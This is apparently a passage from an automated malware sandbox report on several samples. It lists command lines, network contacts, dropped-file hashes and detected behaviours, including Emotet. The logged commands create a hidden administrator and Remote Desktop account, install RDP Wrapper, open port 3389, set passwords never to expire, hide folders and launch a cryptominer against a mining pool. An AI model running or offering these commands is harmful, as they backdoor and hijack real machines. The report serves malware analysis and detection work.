net localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Programdata\RealtekHD\taskhost.exe
C:\Programdata\RealtekHD\taskhost.exe
C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\ProgramData\WindowsTask\MicrosoftHost.exe
C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u RandomX_CPU --donate-level=1 -k -t4
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | 83.205.213.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.200.0.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wininit.club | udp |
| US | 8.8.8.8:53 | winibackup.club | udp |
| IS | 93.95.230.192:80 | winibackup.club | tcp |
| US | 8.8.8.8:53 | winibackup98.club | udp |
| IS | 93.95.230.192:80 | winibackup98.club | tcp |
| US | 8.8.8.8:53 | winibackup549.club | udp |
| IS | 93.95.230.192:80 | winibackup549.club | tcp |
| US | 8.8.8.8:53 | 192.230.95.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wininit.club | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | winibackup.club | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| IS | 93.95.230.192:80 | winibackup.club | tcp |
| US | 8.8.8.8:53 | winibackup98.club | udp |
| IS | 93.95.230.192:80 | winibackup98.club | tcp |
| US | 8.8.8.8:53 | winibackup549.club | udp |
| IS | 93.95.230.192:80 | winibackup549.club | tcp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dashost.club | udp |
| DE | 195.201.70.87:80 | dashost.club | tcp |
| US | 8.8.8.8:53 | 87.70.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | loders.xyz | udp |
| RU | 185.255.134.239:3333 | loders.xyz | tcp |
| US | 8.8.8.8:53 | 239.134.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\aut6E4B.tmp
| MD5 | 204d1fc66f62b26d0b5e00b092992d7d |
| SHA1 | e9a179cb62d7fddf9d4345d76673c49c88f05536 |
| SHA256 | 69c6fb12071b3672e14c9187b3a9e9b9f59437f2fc3ffb1b2f7cc7f78b97455b |
| SHA512 | cdb03b747a120872b984242a9e7d0ee9cc1b89f0d0fcc503a0d8d79b3f73f88acc5532f3bb42ee4cddb054b791baa672e5cf5fea74acda6b6c686768e1152a4f |
C:\ProgramData\Windows\install.vbs
| MD5 | 5e36713ab310d29f2bdd1c93f2f0cad2 |
| SHA1 | 7e768cca6bce132e4e9132e8a00a1786e6351178 |
| SHA256 | cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931 |
| SHA512 | 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1 |
C:\ProgramData\Windows\winit.exe
| MD5 | 701f0baf56e40757b2bf6dabcdcfc7aa |
| SHA1 | cc6a13d816a7bfc7aab2ae2bf9ccfc0b7e1180d4 |
| SHA256 | 8e292fcc70d679093cff331650389d357d85367d910d9ed6ea18722b7e7de370 |
| SHA512 | e448efbb8771db86488a71c87fd2f7f2e8eef4899c07b9d4f0e2157bed97bb2f6f52539a8719e848ccc3ee3cb842646fd49221e74ed16d2f8069760c66097190 |
C:\ProgramData\Windows\reg2.reg
| MD5 | 6a5d2192b8ad9e96a2736c8b0bdbd06e |
| SHA1 | 235a78495192fc33f13af3710d0fe44e86a771c9 |
| SHA256 | 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a |
| SHA512 | 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d |
C:\ProgramData\Windows\reg1.reg
| MD5 | 4dc0fba4595ad8fe1f010f9079f59dd3 |
| SHA1 | b3a54e99afc124c64978d48afca2544d75e69da5 |
| SHA256 | b2fd919e2acd61601c3341179a20ce1d0c2074e8907692dc83d55ba6c6b3eb3a |
| SHA512 | fb0855ad6a33a3efc44453f2a5624e0fc87818bf10d13a87d168be3e9c69b7c8dffb39a34193ab134f42b0af527566e74bada71742c09f90ffd60334ba5143b8 |
C:\Programdata\Windows\install.bat
| MD5 | db76c882184e8d2bac56865c8e88f8fd |
| SHA1 | fc6324751da75b665f82a3ad0dcc36bf4b91dfac |
| SHA256 | e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a |
| SHA512 | da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92 |
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/4896-52-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4896-56-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1628-59-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1628-62-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1628-64-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1628-65-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/3672-67-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/3672-71-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/3672-70-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/3672-68-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/3672-69-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2564-74-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2564-77-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\ProgramData\Windows\vp8decoder.dll
| MD5 | 88318158527985702f61d169434a4940 |
| SHA1 | 3cc751ba256b5727eb0713aad6f554ff1e7bca57 |
| SHA256 | 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74 |
| SHA512 | 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff |
C:\ProgramData\Windows\vp8encoder.dll
| MD5 | 6298c0af3d1d563834a218a9cc9f54bd |
| SHA1 | 0185cd591e454ed072e5a5077b25c612f6849dc9 |
| SHA256 | 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172 |
| SHA512 | 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe |
memory/2564-76-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/3672-80-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2564-75-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2564-73-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1628-63-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1628-61-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1628-60-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4896-57-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4896-55-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4896-54-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4896-53-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4896-51-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\ProgramData\install\cheat.exe
| MD5 | b8aa5d85128fe955865bfd130fd6ed63 |
| SHA1 | 51119e37d2dc17eefdb6edb5d032fb77949038b8 |
| SHA256 | cb18b89fdff97f6d3a7ec89456818163d21c24607b7b04cf513af0d03d804ac9 |
| SHA512 | 059b281e3d0f8f5d7004a82291d18be591468fcdb56c8b5122c1cc245425dcdfde4cfb229fc58a9a438532fdd293e73b87d9228753a670872d591aeb98f3e0c7 |
C:\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | 23d51bd68920fdfd90809197b8c364ff |
| SHA1 | 5eee02db6087702db49acb2619e37d74833321d9 |
| SHA256 | 0e45de428064f864f467f000be38db66ee55d22ddc259d86a5f6a038088cabd1 |
| SHA512 | 3159ccf3c21490e8841dcf950a3fc7359c3ff11a8db851f0b288a070ada4ba682c102668c8d1e922ea046f49cce819ba9bb9e90317e6f3fea1fa7a1799faf9d7 |
memory/2564-112-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\Programdata\RealtekHD\taskhostw.exe
| MD5 | 21feb5dccba8bf69df9a2307d206d033 |
| SHA1 | 65fc243a3530225903bf422f19ffd0e3aad66f03 |
| SHA256 | ff0140dbaa83c7f64b2e86f43cb5f54584b31b371b6c984d8b214fe35eb8e493 |
| SHA512 | b5a25a95cf6d9dcac0de27f253f66cbba76029d6cb9311f41f351d7bb9d556d93023e04e922b42ebd0e47e68e84d2d8c50a37d9c2380524b22d9066079dedaca |
C:\ProgramData\Microsoft\Intel\R8.exe
| MD5 | ad95d98c04a3c080df33ed75ad38870f |
| SHA1 | abbb43f7b7c86d7917d4582e47245a40ca3f33c0 |
| SHA256 | 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd |
| SHA512 | 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed |
C:\rdp\run.vbs
| MD5 | 6a5f5a48072a1adae96d2bd88848dcff |
| SHA1 | b381fa864db6c521cbf1133a68acf1db4baa7005 |
| SHA256 | c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe |
| SHA512 | d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c |
C:\rdp\pause.bat
| MD5 | a47b870196f7f1864ef7aa5779c54042 |
| SHA1 | dcb71b3e543cbd130a9ec47d4f847899d929b3d2 |
| SHA256 | 46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba |
| SHA512 | b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60 |
memory/2564-152-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\programdata\microsoft\temp\H.bat
| MD5 | ec45b066a80416bdb06b264b7efed90d |
| SHA1 | 6679ed15133f13573c1448b5b16a4d83485e8cc9 |
| SHA256 | cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e |
| SHA512 | 0b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c |
C:\rdp\Rar.exe
| MD5 | 2e86a9862257a0cf723ceef3868a1a12 |
| SHA1 | a4324281823f0800132bf13f5ad3860e6b5532c6 |
| SHA256 | 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8 |
| SHA512 | 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de |
C:\rdp\db.rar
| MD5 | 462f221d1e2f31d564134388ce244753 |
| SHA1 | 6b65372f40da0ca9cd1c032a191db067d40ff2e3 |
| SHA256 | 534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432 |
| SHA512 | 5e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086 |
C:\Programdata\Install\del.bat
| MD5 | ed57b78906b32bcc9c28934bb1edfee2 |
| SHA1 | 4d67f44b8bc7b1d5a010e766c9d81fb27cab8526 |
| SHA256 | c3a1bd76b8539fdf83b723f85b6ea7cd35104b0ec14429774059208d2660177d |
| SHA512 | d2a95257e37b4b4154aec2234e31423632598a870d2bb803ce27cb242d5bdff5ea1b7475577245f80d3ad069872e9ae2adcd05d5145e081db864185a5e7bda33 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | d85d974315792326bbd4c7e58130c5e4 |
| SHA1 | 3bc9eb9bef0209c53ad7761d907f42be0e94f3db |
| SHA256 | b96a11cffa0d02884e1ee8ab133bfbc3ad717931f4be5d6de1c6a83f80f77054 |
| SHA512 | 4737e948fb4a6724a20cd185f47c412a8d1632b0379a5b6ed9c31ab07ea6fab48fec2b6f7a94e52ca9eb35a7a602989f5fc01dd7089bdeeca789b4027ff41f9e |
C:\rdp\RDPWInst.exe
| MD5 | 3288c284561055044c489567fd630ac2 |
| SHA1 | 11ffeabbe42159e1365aa82463d8690c845ce7b7 |
| SHA256 | ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753 |
| SHA512 | c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02 |
\??\c:\program files\rdp wrapper\rdpwrap.ini
| MD5 | dddd741ab677bdac8dcd4fa0dda05da2 |
| SHA1 | 69d328c70046029a1866fd440c3e4a63563200f9 |
| SHA256 | 7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668 |
| SHA512 | 6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec |
C:\Program Files\RDP Wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
C:\ProgramData\RealtekHD\taskhost.exe
| MD5 | 676f368fed801fb2a5350f3bdc631d0b |
| SHA1 | e129c24447d7986fb0ed1725b240c00d4d9489ea |
| SHA256 | 5c4eaa5bce7f19f29013685899d8205245f4a5a7728e770458619510e661b145 |
| SHA512 | d4a3fb68eea4bcad55657a17ff8474d220e6e6cd113cb42d4d00a698e59941b1dab33bb626901fedeb312dee0c0a0559f9e4a75761028eab69a686c61e81160d |
C:\rdp\bat.bat
| MD5 | 5835a14baab4ddde3da1a605b6d1837a |
| SHA1 | 94b73f97d5562816a4b4ad3041859c3cfcc326ea |
| SHA256 | 238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92 |
| SHA512 | d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e |
C:\rdp\install.vbs
| MD5 | 6d12ca172cdff9bcf34bab327dd2ab0d |
| SHA1 | d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493 |
| SHA256 | f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec |
| SHA512 | b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342 |
C:\Program Files\Common Files\System\iediagcmd.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/3864-378-0x0000000000400000-0x000000000056F000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419
| MD5 | 1e453f87d920d227e748bad8b08c98ee |
| SHA1 | 8221c909bd5f33a7cf56fe908b1ff40f3d263bad |
| SHA256 | a737fe42f5b664b332d513c1320d1861c8501b8a3b5797321f1b25f02615203a |
| SHA512 | 9d5ffc4d90512612c107761a8ed120ed2211305f049181c878e6daf2b6c3989491ffcd366d339f98cecbf72e108dbeda86107cf14df49c27cbe80f32624d47b0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419
| MD5 | e10a2a16e19843942191cdd2c33f0dbe |
| SHA1 | fc4216d9b1c319680884193aa975196f610a689c |
| SHA256 | 599ca69375627e049b3deab0ade75cb0dd3be5899ac4e6d41ebfd71c3b119bbf |
| SHA512 | 6c67f24668bfd27cea0278bab7358a49a9b185361e1cd963075e2282496773ea5d73f74cdaa3355955eaaab172c772ab1b61adb8edb478b88caf78643413c6fd |
memory/4328-399-0x0000000000400000-0x000000000056F000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | e335b19dd00855d6d352f8c0512bab33 |
| SHA1 | 335f886a166b852beeb1dfec3d27eeced4a11547 |
| SHA256 | 8f16e9d38dd11092dd0ef01e91c551aa15d161396e84c9b534de8d646118028d |
| SHA512 | ef8cda0161d1be8a84942e20689163a880e3d95f7914a6c80f9b2714ca26fe5cbb677a2341ad5bda203e0cbad71b3df9a068e2accfc2164d132adfbdbb9adbcd |
memory/2564-652-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2564-662-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\aut484F.tmp
| MD5 | ec0f9398d8017767f86a4d0e74225506 |
| SHA1 | 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36 |
| SHA256 | 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375 |
| SHA512 | d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484 |
memory/3400-674-0x0000000000610000-0x00000000006FC000-memory.dmp
memory/3400-680-0x0000000000610000-0x00000000006FC000-memory.dmp
memory/2564-686-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\ProgramData\WindowsTask\MicrosoftHost.exe
| MD5 | 191f67bf26f68cef47359b43facfa089 |
| SHA1 | 94529e37aa179e44e22e9ccd6ee0de8a49a8f2fc |
| SHA256 | 2144c0d5d80613e66c393271c11c374afc57ae910d455bed661bb5cb04c1d2c5 |
| SHA512 | 7d8de83158acf23b8a3fda50106e36f59c3888c99e45b8fa46599c45f6e80e3b6e4cdcbbf440f442446a93933685e086925338320716d3919a9033118425102b |
memory/5024-701-0x000001BA1AE30000-0x000001BA1AE44000-memory.dmp
C:\ProgramData\WindowsTask\WinRing0x64.sys
| MD5 | 0c0195c48b6b8582fa6f6373032118da |
| SHA1 | d25340ae8e92a6d29f599fef426a2bc1b5217299 |
| SHA256 | 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 |
| SHA512 | ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d |
memory/2564-710-0x0000000000400000-0x0000000000AB9000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
144s
Max time network
149s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
| US | 8.8.8.8:53 | dobiacamarmnia.3utilities.com | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
138s
Max time network
155s
Command Line
Signatures
Emotet
Emotet family
Emotet payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5032 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe | C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe |
| PID 5032 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\emotet_exe_e3_93074e9fbde60e4182f5d763bac7762f2d4e2fcf9baf457b6f12e7696b3562c1_2020-11-17__182823.exe | C:\Windows\SysWOW64\WpPortingLibrary\scripto.exe |
